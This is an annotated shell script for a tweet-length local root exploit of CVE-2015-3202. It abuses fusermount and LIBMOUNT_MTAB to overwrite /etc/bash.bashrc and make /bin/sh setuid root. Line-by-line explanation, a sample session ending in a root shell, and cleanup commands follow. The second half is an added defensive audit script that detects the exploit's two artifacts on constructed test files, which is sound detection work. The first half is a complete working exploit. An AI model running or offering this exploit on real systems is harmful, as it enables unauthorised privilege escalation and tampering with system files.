# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
#
# 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202

# Here $a holds the name of a shell script that will be executed as
# root.
a=/tmp/.$$;

# $b is used twice: as the contents of the shell script $a, and then as
# a command to make $a executable.
# Quotes are unused to save a character, so the separator must be escaped.
b=chmod\ u+sx;

# Build the shell script $a, which should contain "chmod u+sx /bin/sh", making
# /bin/sh setuid root. This works on Debian/Ubuntu because they use dash,
# and don't make it drop privileges.
#
# http://www.openwall.com/lists/oss-security/2013/08/22/12
#
echo $b /bin/sh>$a;

# Now make the $a script executable using the command in $b. This needlessly
# sets the setuid bit as well, but that doesn't do any harm.
$b $a;

# Now make $a the directory we want fusermount to use. This directory name is
# written to an arbitrary file as part of the vulnerability and so needs to be
# formed such that it's a valid shell command.
a+=\;$a;

# Create the mount point for fusermount.
mkdir -p $a;

# fusermount calls setuid(geteuid()) to reset the ruid as it invokes
# /bin/mount, so that it can use privileged mount options that are normally
# restricted if ruid != euid. That's acceptable (but scary) in theory, because
# fusermount can sanitize the options it passes.
#
# However, because mount thinks it's being invoked by root, it allows
# access to debugging features via the environment that would not normally be
# safe for unprivileged users, and fusermount doesn't sanitize them.
#
# Therefore, the bug is that the environment is not cleared when calling mount
# with ruid=0. One debugging feature available is changing the location of
# /etc/mtab by setting LIBMOUNT_MTAB, which we can abuse to overwrite arbitrary
# files.
#
# In this case, I'm trying to overwrite /etc/bash.bashrc (using the name of the
# current shell, $0... so it only works if you're using bash!).
#
# The line written by fusermount will look like this:
#
# /dev/fuse /tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx
#
# Which will try to execute /dev/fuse with the parameter /tmp/_, fail because
# /dev/fuse is a device node, and then run /tmp/_ with the parameters fuse
# xxx,xxx,xxx,xxx. This means executing /bin/sh would give you a root shell the
# next time root logs in.
#
# Another way to exploit it would be overwriting /etc/default/locale, then
# waiting for cron to run /etc/cron.daily/apt at midnight. That means root
# wouldn't have to log in, but you would have to wait around until midnight to
# check if it worked.
#
# And we have enough characters left for a hashtag/comment.
LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202

# Here's how the exploit looks:
#
# $ a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
# fusermount: failed to open /etc/fuse.conf: Permission denied
# sending file descriptor: Socket operation on non-socket
# $ cat /etc/bash.bashrc
# /dev/fuse /tmp/_;/tmp/_ fuse rw,nosuid,nodev,user=taviso 0 0
#
# Now, root logs in next...
#
# $ sudo -s
# bash: /dev/fuse: Permission denied
# # ls -l /bin/sh
# -rwsr-xr-x 1 root root 121272 Feb 2014 /bin/sh
# # exit
# $ sh -c 'id'
# euid=0(root) groups=0(root)
#
# To repair the damage after testing, do this:
#
# $ sudo rm /etc/bash.bashrc
# $ sudo apt-get install -o Dpkg::Options::="--force-confmiss" --reinstall -m bash
# $ sudo chmod 0755 /bin/sh
# $ sudo umount /tmp/.$$\;/tmp/.$$
# $ rm -rf /tmp/.$$ /tmp/.$$\;
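The walkthrough above describes two artifacts this class of bug leaves on a host: an mtab-format line ("/dev/fuse <dir> fuse <options> 0 0") written into a shell startup file via LIBMOUNT_MTAB, and /bin/sh carrying the setuid bit afterwards. The following audit script is an added example of my own, not part of Tavis Ormandy's script above. It checks a startup file and a shell binary for exactly those two indicators; the function names (startup_file_clean, not_setuid, audit) are this example's own, and the inputs it runs against are constructed temporary files so it works offline. On a real host you would point it at /etc/bash.bashrc and /bin/sh.

```shell
#!/bin/sh
# Added defensive example (not from the original exploit script). Audits for
# the post-exploitation artifacts described above:
#   1. a shell rc file containing an mtab-style "/dev/fuse ... fuse ..." entry
#      (the signature of an arbitrary-file write through LIBMOUNT_MTAB), and
#   2. a shell binary with the setuid bit set (expected mode is 0755).
# Function and variable names are hypothetical; paths are arguments so the
# checks can run against constructed test files.

# Returns 0 when the file holds no mtab-style /dev/fuse entry, 1 when it does.
# An mtab line has no business in a shell startup file, so any match is a finding.
startup_file_clean() {
    if grep -Eq '^/dev/fuse[[:space:]]+[^[:space:]]+[[:space:]]+fuse[[:space:]]' "$1" 2>/dev/null; then
        return 1
    fi
    return 0
}

# Returns 0 when the path does not carry the setuid bit, 1 when it does.
# (A missing file also reports "not setuid"; check existence separately.)
not_setuid() {
    [ ! -u "$1" ]
}

# Runs both checks, prints a one-line verdict for each and returns the number
# of findings (0 = clean, up to 2).
audit() {
    rc_file="$1"; shell_bin="$2"; findings=0
    if startup_file_clean "$rc_file"; then
        echo "ok:   $rc_file has no mtab-style /dev/fuse entry"
    else
        echo "WARN: $rc_file contains an mtab-style /dev/fuse entry (LIBMOUNT_MTAB write?)"
        findings=$((findings + 1))
    fi
    if not_setuid "$shell_bin"; then
        echo "ok:   $shell_bin is not setuid"
    else
        echo "WARN: $shell_bin is setuid; expected mode 0755"
        findings=$((findings + 1))
    fi
    return $findings
}

# Constructed sample inputs so the script runs offline. The tampered rc line
# is the one shown in the walkthrough above; the mode bits mirror a clean and
# a modified /bin/sh.
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
printf '%s\n' '# System-wide .bashrc' 'shopt -s checkwinsize' > "$tmp/clean.bashrc"
printf '%s\n' '/dev/fuse /tmp/_;/tmp/_ fuse rw,nosuid,nodev,user=taviso 0 0' > "$tmp/tampered.bashrc"
: > "$tmp/sh_ok";  chmod 0755 "$tmp/sh_ok"
: > "$tmp/sh_bad"; chmod 4755 "$tmp/sh_bad"

audit "$tmp/clean.bashrc" "$tmp/sh_ok"        # prints two "ok" lines, returns 0
audit "$tmp/tampered.bashrc" "$tmp/sh_bad"    # prints two "WARN" lines, returns 2
```

The grep pattern anchors on the mtab field layout (device, mount point, filesystem type) rather than on a particular directory name, so it also catches entries whose mount point is something other than the /tmp/_ shape used in the demo; the exit status lets a cron job or configuration-management run treat any non-zero result as a finding.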